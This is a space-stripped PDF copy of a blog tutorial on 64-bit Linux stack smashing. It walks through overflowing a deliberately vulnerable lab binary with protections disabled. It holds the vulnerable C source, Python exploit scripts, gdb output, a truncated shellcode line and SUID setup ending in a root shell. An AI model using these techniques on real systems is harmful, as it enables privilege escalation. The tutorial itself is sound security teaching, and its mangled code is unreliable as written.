64-Bit Linux Stack Smashing Tutorial - Part 1 - Techorganic - Musings From The Brainpan

5/16/2016 64bitLinuxstacksmashingtutorial:Part1TechorganicMusingsfromthebrainpan
Techorganic
Musingsfromthebrainpan
About PGP Disclaimer Vulnerabilities
64bitLinuxstacksmashingtutorial:Part1
WrittenonApril10,2015
Thisseriesoftutorialsisaimedasaquickintroductiontoexploitingbuffer
overflowson64bitLinuxbinaries.Itsgearedprimarilytowardsfolkswhoare
alreadyfamiliarwithexploiting32bitbinariesandarewantingtoapplytheir
knowledgetoexploiting64bitbinaries.Thistutorialistheresultofcompiling
scatterednotesIvecollectedovertimeintoacohesivewhole.
Idliketogivespecialthankstobarrebasfortakingthetimetoproofreadmy
writingandforprovidingvaluablefeedback.Muchappreciated!
Setup
Writingexploitsfor64bitLinuxbinariesisnttoodifferentfromwriting32bit
exploits.TherearehoweverafewgotchasandIllbetouchingonthoseaswego
along.Thebestwaytolearnthisstuffistodoit,soIencourageyoutofollow
along.IllbeusingUbuntu14.10tocompilethevulnerablebinariesaswellasto
writetheexploits.Illprovideprecompiledbinariesaswellincaseyoudontwant
tocompilethemyourself.Illalsobemakinguseofthefollowingtoolsforthis
particulartutorial:
PythonExploitDevelopmentAssistanceforGDB
getenvaddr.c
64bit,whatyouneedtoknow
Forthepurposeofthistutorial,youshouldbeawareofthefollowingpoints:
Generalpurposeregistershavebeenexpandedto64bit.Sowenowhave
https://blog.techorganic.com/2015/04/10/64bitlinuxstacksmashingtutorialpart1/ 1/10
RAX,RBX,RCX,RDX,RSI,andRDI.
Instructionpointer,basepointer,andstackpointerhavealsobeenexpanded
to64bitasRIP,RBP,andRSPrespectively.
Additionalregistershavebeenprovided:R8toR15.
Pointersare8byteswide.
Push/poponthestackare8byteswide.
Maximumcanonicaladdresssizeof0x00007FFFFFFFFFFF.
Parameterstofunctionsarepassedthroughregisters.
Itsalwaysgoodtoknowmore,sofeelfreetoGoogleinformationon64bit
architectureandassemblyprogramming.Wikipediahasaniceshortarticlethats
worthreading.
Classicstacksmashing
Letsbeginwithaclassicstacksmashingexample.WelldisableASLR,NX,and
stackcanariessowecanfocusontheactualexploitation.Thesourcecodefor
ourvulnerablebinaryisasfollows:
/*Compile:gccfnostackprotectorzexecstackclassic.coclassic
/*DisableASLR:echo0>/proc/sys/kernel/randomize_va_space
#include<stdio.h>
#include<unistd.h>
intvuln(){
charbuf[80]
intr
r=read(0,buf,400)
printf("\nRead%dbytes.bufis%s\n",r,buf)
puts("Noshellforyou:(")
return0
}
intmain(intargc,char*argv[]){
printf("Trytoexec/bin/sh")
vuln()
return0
}
Youcanalsograbtheprecompiledbinaryhere.
Theresanobviousbufferoverflowinthevuln()functionwhenread()cancopyup
to400bytesintoan80bytebuffer.Sotechnicallyifwepass400bytesin,we
shouldoverflowthebufferandoverwriteRIPwithourpayloadright?Letscreate
anexploitcontainingthefollowing:
#!/usr/bin/envpython
buf=""
buf+="A"*400
f=open("in.txt","w")
f.write(buf)
Thisscriptwillcreateafilecalledin.txtcontaining400As.Wellloadclassicinto
gdbandredirectthecontentsofin.txtintoitandseeifwecanoverwriteRIP:
gdbpeda$r<in.txt
Trytoexec/bin/sh
Read400bytes.bufisAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Noshellforyou:(
ProgramreceivedsignalSIGSEGV,Segmentationfault.
[registers
RAX:0x0
RBX:0x0
RCX:0x7ffff7b015a0(<__write_nocancel+7>:cmprax,0xfffffffffffff0
RDX:0x7ffff7dd5a00>0x0
RSI:0x7ffff7ff5000("Noshellforyou:(\nis",'A'<repeats92times>
RDI:0x1
RBP:0x4141414141414141('AAAAAAAA')
RSP:0x7fffffffe508('A'<repeats200times>...)
RIP:0x40060f(<vuln+73>:ret)
R8:0x283a20756f792072('ryou:(')
R9:0x4141414141414141('AAAAAAAA')
R10:0x7fffffffe260>0x0
R11:0x246
R12:0x4004d0(<_start>:xorebp,ebp)
R13:0x7fffffffe600('A'<repeats48times>,"|\350\377\377\377\177")
R14:0x0
R15:0x0
EFLAGS:0x10246(carryPARITYadjustZEROsigntrapINTERRUPTdirection
[code
0x400604<vuln+62>:call0x400480<puts@plt>
0x400609<vuln+67>:moveax,0x0
0x40060e<vuln+72>:leave
=>0x40060f<vuln+73>:ret
0x400610<main>:pushrbp
0x400611<main+1>:movrbp,rsp
0x400614<main+4>:subrsp,0x10
0x400618<main+8>:movDWORDPTR[rbp0x4],edi
[stack
0000|0x7fffffffe508('A'<repeats200times>...)
[
Legend:code,data,rodata,value
Stoppedreason:SIGSEGV
0x000000000040060finvuln()
Sotheprogramcrashedasexpected,butnotbecauseweoverwroteRIPwithan
invalidaddress.InfactwedontcontrolRIPatall.RecallasImentionedearlier
thatthemaximumaddresssizeis0x00007FFFFFFFFFFF.WereoverwritingRIP
withanoncanonicaladdressof0x4141414141414141whichcausesthe
processortoraiseanexception.InordertocontrolRIP,weneedtooverwriteit
with0x0000414141414141instead.Soreallythegoalistofindtheoffsetwith
whichtooverwriteRIPwithacanonicaladdress.Wecanuseacyclicpatternto
findthisoffset:
gdbpeda$pattern_create400in.txt
Writingpatternof400charstofilename"in.txt"
LetsrunitagainandexaminethecontentsofRSP:
gdbpeda$r<in.txt
Trytoexec/bin/sh
Read400bytes.bufisAAA%AAsAABAA$AAnAACAAAA(AADAAAA)AAEAAaAA0AAFAA
Noshellforyou:(
[registers
RAX:0x0
RBX:0x0
RSI:0x7ffff7ff5000("Noshellforyou:(\nisAAA%AAsAABAA$AAnAACAAAA(
RDI:0x1
RBP:0x416841414c414136('6AALAAhA')
RSP:0x7fffffffe508("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAA
RIP:0x40060f(<vuln+73>:ret)
R8:0x283a20756f792072('ryou:(')
R9:0x4147414131414162('bAA1AAGA')
R11:0x246
R13:0x7fffffffe600("A%nA%SA%oA%TA%pA%UA%qA%VA%rA%WA%sA%XA%tA%YA%uA%Z|
R14:0x0
R15:0x0
[code
0x400604<vuln+62>:call0x400480<puts@plt>
0x400609<vuln+67>:moveax,0x0
0x40060e<vuln+72>:leave
=>0x40060f<vuln+73>:ret
0x400610<main>:pushrbp
0x400611<main+1>:movrbp,rsp
0x400614<main+4>:subrsp,0x10
0x400618<main+8>:movDWORDPTR[rbp0x4],edi
[stack
0000|0x7fffffffe508("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASA
0008|0x7fffffffe510("AA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAAp
0016|0x7fffffffe518("jAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAA
0024|0x7fffffffe520("AkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWA
0032|0x7fffffffe528("AAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAt
0040|0x7fffffffe530("RAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAA
0048|0x7fffffffe538("AoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwA
0056|0x7fffffffe540("AAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAz
[
Wecanclearlyseeourcyclicpatternonthestack.Letsfindtheoffset:
gdbpeda$x/wx$rsp
0x7fffffffe508:0x41413741
gdbpeda$pattern_offset0x41413741
1094793025foundatoffset:104
SoRIPisatoffset104.LetsupdateourexploitandseeifwecanoverwriteRIP
thistime:
fromstructimport*
buf=""
buf+="A"*104#offsettoRIP
buf+=pack("<Q",0x424242424242)#overwriteRIPwith0x000042424242
buf+="C"*290#paddingtokeeppayloadlengthat
f.write(buf)
Runittocreateanupdatedin.txtfile,andthenredirectitintotheprogramwithin
gdb:
gdbpeda$r<in.txt
Trytoexec/bin/sh
Noshellforyou:(
[registers
RAX:0x0
RBX:0x0
RSI:0x7ffff7ff5000("Noshellforyou:(\nis",'A'<repeats92times>
RDI:0x1
RBP:0x4141414141414141('AAAAAAAA')
RSP:0x7fffffffe510('C'<repeats200times>...)
RIP:0x424242424242('BBBBBB')
R8:0x283a20756f792072('ryou:(')
R9:0x4141414141414141('AAAAAAAA')
R11:0x246
R13:0x7fffffffe600('C'<repeats48times>,"|\350\377\377\377\177")
R14:0x0
R15:0x0
[code
Invalid$PCaddress:0x424242424242
[stack
0000|0x7fffffffe510('C'<repeats200times>...)
[
Legend:code,data,rodata,value
Stoppedreason:SIGSEGV
0x0000424242424242in??()
Excellent,wevegainedcontroloverRIP.Sincethisprogramiscompiledwithout
NXorstackcanaries,wecanwriteourshellcodedirectlyonthestackandreturn
toit.Letsgoaheadandfinishit.Illbeusinga27byteshellcodethatexecutes
execve(/bin/sh)foundhere.
Wellstoretheshellcodeonthestackviaanenvironmentvariableandfindits
addressonthestackusinggetenvaddr:
koji@pwnbox:~/classic$exportPWN=`pythonc'print"\x31\xc0\x48\xbb\x
koji@pwnbox:~/classic$~/getenvaddrPWN./classic
PWNwillbeat0x7fffffffeefa
Wellupdateourexploittoreturntoourshellcodeat0x7fffffffeefa:
fromstructimport*
buf=""
buf+="A"*104
buf+=pack("<Q",0x7fffffffeefa)
f.write(buf)
MakesuretochangetheownershipandpermissionofclassictoSUIDrootsowe
cangetourrootshell:
koji@pwnbox:~/classic$sudochownrootclassic
koji@pwnbox:~/classic$sudochmod4755classic
Andfinally,wellupdatein.txtandpipeourpayloadintoclassic:
koji@pwnbox:~/classic$python./sploit.py
koji@pwnbox:~/classic$(catin.txtcat)|./classic
Trytoexec/bin/sh
Noshellforyou:(
whoami
root
Wevegotarootshell,soourexploitworked.Themaingotchaherewasthatwe
neededtobemindfulofthemaximumaddresssize,otherwisewewouldnthave
beenabletogaincontrolofRIP.Thisconcludespart1ofthetutorial.
Part1wasprettyeasy,soforpart2wellbeusingthesamebinary,onlythistime
itwillbecompiledwithNX.Thiswillpreventusfromexecutinginstructionsonthe
stack,sowellbelookingatusingret2libctogetarootshell.Staytuned!
0Comments Techorganic
1 Login
Recommend Share SortbyBest
Startthediscussion
Bethefirsttocomment.
ALSOONTECHORGANIC
64bitLinuxStackSmashingTutorial: HellHackingChallenge
Part1 7comments8monthsago
24comments8monthsago twifesThankusuperkojimanforallwalk
superkojimangdbwillhavedifferent through's.pleasemakevideo
addressesinthestack.Butthewayyou walkthrough'sinfuturelikegotmilk'sifu
callgetenvaddrisimportant.Eg:# wishfornewvuln
./getenvaddr
CapturingtheWPAHandshakeUsing Securelydeletefilesandfoldersfrom
MassDeauthentication FinderTechorganicMusingsfromthe
2comments8monthsago brainpan
2commentsamonthago
AbdouAbdelhalim Iranthescriptin superkojimanFixed!Thanksforpointing
chmod,Icheckedmyinterface,madea itout!
target_list,butitdidn'twork?canyou
makeamoredetailed
Subscribe d AddDisqustoyoursiteAddDisqusAdd Privacy

64-Bit Linux Stack Smashing Tutorial - Part 1 - Techorganic - Musings From The Brainpan

Hochgeladen von

Dokumentinformationen

Originaltitel

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

64-Bit Linux Stack Smashing Tutorial - Part 1 - Techorganic - Musings From The Brainpan

Hochgeladen von

Copyright:

Verfügbare Formate

5/16/2016 64bitLinuxstacksmashingtutorial:Part1TechorganicMusingsfromthebrainpan

About PGP Disclaimer Vulnerabilities

Recommend Share SortbyBest

Subscribe d AddDisqustoyoursiteAddDisqusAdd Privacy

Das könnte Ihnen auch gefallen